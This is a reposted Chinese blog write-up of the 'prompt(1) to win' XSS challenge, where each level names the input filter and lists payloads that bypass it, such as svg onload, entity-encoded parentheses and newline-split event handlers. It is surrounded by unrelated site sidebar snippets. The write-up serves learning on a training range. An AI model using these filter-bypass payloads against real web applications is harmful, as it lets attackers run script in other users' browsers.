prompt(1) to win writeup

最新推荐文章于 2022-12-14 23:05:07 发布
最新推荐文章于 2022-12-14 23:05:07 发布
阅读量719 收藏
点赞数
分类专栏: 网络安全

转载自http://blog.csdn.net/sinat_25449961/article/details/69361520

0

没有任何过滤

"><script>prompt(1)</script>
或者
"><svg/onload=prompt(1)>

1

过滤了大于号>,采用注释符//绕过

aa<svg/onload=prompt(1)//

2

过滤了左括号(,使用<svg>标签绕过。在SVG向量里面的<script>元素(或者其他CDATA元素 ),会先进行xml解析。因此&#x28;(十六进制)或者&#40;(十进制)或者&lpar;(html实体编码)会被还原成(。

<svg><script>prompt&#40;1)</script>
或者
<svg><script>prompt&#40;1)<b>
或者

<script>eval.call`${'prompt\x281)'}`</script>
 
 
  • 1

或者

<script>eval.call`${'prompt\x281)'}`</script>
 
 
  • 1

3

过滤了-->,可用--!>代替

a--!><script>prompt(1)</script>
或者
--!><svg/onload=prompt(1)

4

5

过滤了onxxx,过滤了>,通过回车符号绕过onxxx过滤

aa" type=image src=x onerror
="prompt(1)

6

仔细看源码

javascript:prompt(1)#{"action":1}

7

使用“和=构造payload

"><svg/a=#"onload='/*#*/prompt(1)'


EDDJH_31
关注
专栏目录
prompt-to-prompt-main
03-29
"prompt-to-prompt-main"项目概述 在IT领域,"prompt-to-prompt"通常指的是一个交互式编程或自然语言处理的概念,它涉及到一种基于提示到提示的系统设计。这种系统的核心在于,它允许用户通过一系列的提示(prompts...
XSS的练习
留得半世听茶香的博客
03-05 322
文章转载自:https://blog.csdn.net/Ni9htMar3/article/details/77938899 ...
xss跨站脚本攻击
m0_67265464的博客
03-06 219
概述: 主要指攻击者可以再页面中插入恶意脚本代码,当受害者访问这些页面时,浏览器会解析并执行这些恶意代码,从而达到窃取用户身份、钓鱼、传播恶意代码和控制用户浏览器等行为 产生原因: 由于web程序对用户的输入过滤不足、,导致用户输入的恶意HTML/Javascript 代码注入到网页中,混淆原有语义,产生新的恶意语句。在其他用户访问网页时,浏览器就会触发恶意的网页代码,从而达到XSS攻击的目的 分类: 反射型:恶意代码并没有保存在目标网站,通过引诱用户点击一个链接到目标网站的恶意链接来实施攻击 输入: 输
prompt(1) to win -xss学习
shinygod的博客
11-22 964
prompt(1) to win xss 学习
XSS靶场(三)prompt to win
C_LCH_2000的博客
07-31 312
prompt to win 关卡详解
SQL Prompt 7.5.1.1000
05-31
SQL Prompt 7.5最后一个版本,更新的版本不再支持2008 R2及更早的数据库
SQL Prompt (1).zip
10-25
在安装SQL Prompt时,用户通常只需要下载并解压“SQL Prompt (1).zip”这样的压缩包文件,然后按照步骤进行安装。压缩包内可能包含了安装程序、许可证文件、帮助文档等相关资源。确保电脑满足最低系统需求后,双击...
SQL Prompt 6.4.1.142
12-08
如果从来没安装过SQL Prompt, 先安装5.3.0.3版,然后升级到6.4.1.142。 如果已经安装了6.4以前的版本,直接安装6.4.1.142就可。 第一步: 1,安装SQLPrompt v5.3.0.3,这个不多说。 2,安装完毕后,断开网络连接。 ...
Prompt6.4.1.145.rar
06-11
Microsoft SQL Server support SQL Prompt can connect to the following versions of SQL Server: SQL Server 2014 SQL Server 2012 SQL Server 2008 SQL Server 2008 R2 SQL Server 2005 SQL Server 2000 SQL ...
xss练习-prompt(1) to win
Ni9htMar3的博客
09-11 9719
链接地址: http://prompt.ml/0 规则1、成功执行prompt(1). 2、payload不需要用户交互 3、payload必须对下述浏览器有效: - Chrome(最新版) - Firefox(最新版) - IE10 及以上版本(或者IE10兼容模式)4、每个级别至少给出两种浏览器的答案 5、字符越少越好level 0function escape(input)
XSS靶场prompt.ml过关详解
m0_46467017的博客
07-30 1338
prompt.ml也是一个线上的白盒靶场,与之前的其他xss靶场相比,prompt靶场更加偏向于模拟真实环境下的代码,需要一定的代码审计能力才可以完成关卡。1、成功执行prompt(1)即可获胜,payload不需要用户交互,若成功执行,界面会显示YOUWON。2、每个payload均需要在以下浏览器测试Chrome(最新版)、Firefox(最新版)、IE103、虽然大多数级别都具有所有浏览器解决方案,但有些可能没有。确保每个级别都有至少两个浏览器的解决方案。......
配置hosts文件,输入某域名(www.XXX.com)时出现自己的页面
热门推荐
m6494854的博客
12-14 8万+
配置hosts文件,输入某域名(www.XXX.com)时出现自己的页面
prompt(1)to win靶场(1~9)
newlife1441的博客
08-02 558
呼叫提示符prompt(1)获胜,你应该在没有用户交互的情况下制作它。在完成每个关卡后,你的有效载荷将等待验证并测试最新版本,Firefox(最新版本)、ie10,虽然大多数级别都有所有浏览器解决方案,但有些可能没有。可以保证每个级别至少有两个浏览器的解决方案。最后但并非最不重要的是,有效载荷需要更少的角色,下面是靶场的网址http。...
prompt(1) to win -----XSS学习笔记
Assassin
08-13 1万+
一直不是很懂XSS,所以这里专门来学习一下下!记录做题的过程嗯。规则是当想办法嵌入prompt(1) 就算胜利了第0关什么过滤都没有,payload如下"><script>prompt(1)</script><"第1关—<> 过滤function escape(input) { // tags stripping mechanism from ExtJS library // Ext
HTML 事件
weixin_30325487的博客
02-11 199
1、HTML 全局事件属性   HTML4 的新特性之一就是可以使 HTML 事件触发浏览器中的行为,比方说当用户点击某个 HTML 元素时启动一段 JavaScript,在 HTML5 中还增加了一些新的事件属性。   HTML 事件就是发生在 HTML 元素上的事情。当在 HTML 页面中使用 JavaScript 时, JavaScript 就可以触发这些事件。HTML 事件可以是浏览器...
<svg/onload=prompt()>
qq_33442338的博客
01-23 1699
<svg/onload=prompt()>
XSS现代WAF规则探测及绕过技术
专注企业信息安全-sec
09-28 651
初始测试 1、使用无害的payload,类似<b>,<i>,<u>观察响应,判断应用程序是否被HTML编码,是否标签被过滤,是否过滤<>等等; 2、如果过滤闭合标签,尝试无闭合标签的payload(<b,<i,<marquee)观察响应; 3、尝试以下的payload <script>alert(1);</script> <script>prompt(1);</script> <
【命令汇总】XSS payload 速查表
weixin_30920513的博客
06-27 491
日期:2019-05-15 14:06:21 作者:Bay0net 介绍:收集并且可用的一些 XSS payload,网上的速查表很多,但是测试了下很多 payload 的不可用,这里都是自己能用的 0x01、 基本流程 先使用无害的标签进行测试,比如<b>、<i>、<u>等,然后在测试是否过滤了 '、"、<> 等 0x02、可用的...
type help to learn how to use xshell prompt
最新发布
04-03
As an AI language model, I am not able to use Xshell prompt or any other software. However, here are some basic commands to use in Xshell prompt: 1. Connecting to a remote server: - Type "ssh username@remote_server_ip_address" - Enter your password when prompted 2. Navigating through directories: - Type "cd directory_name" to enter a specific directory - Type "ls" to list the contents of the current directory 3. Creating and deleting files/directories: - Type "touch filename" to create a new file - Type "mkdir directory_name" to create a new directory - Type "rm filename" to delete a file - Type "rmdir directory_name" to delete an empty directory 4. Managing permissions: - Type "chmod permissions filename" to change the permissions of a file (replace "permissions" with the desired value, such as 755 or 644) 5. Transferring files: - Use the "scp" command to transfer files between your local machine and the remote server. Example: "scp /path/to/local/file username@remote_server:/path/to/destination" These are just some basic commands to get started using Xshell prompt. For more information, check out the Xshell documentation or type "help" within the prompt.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值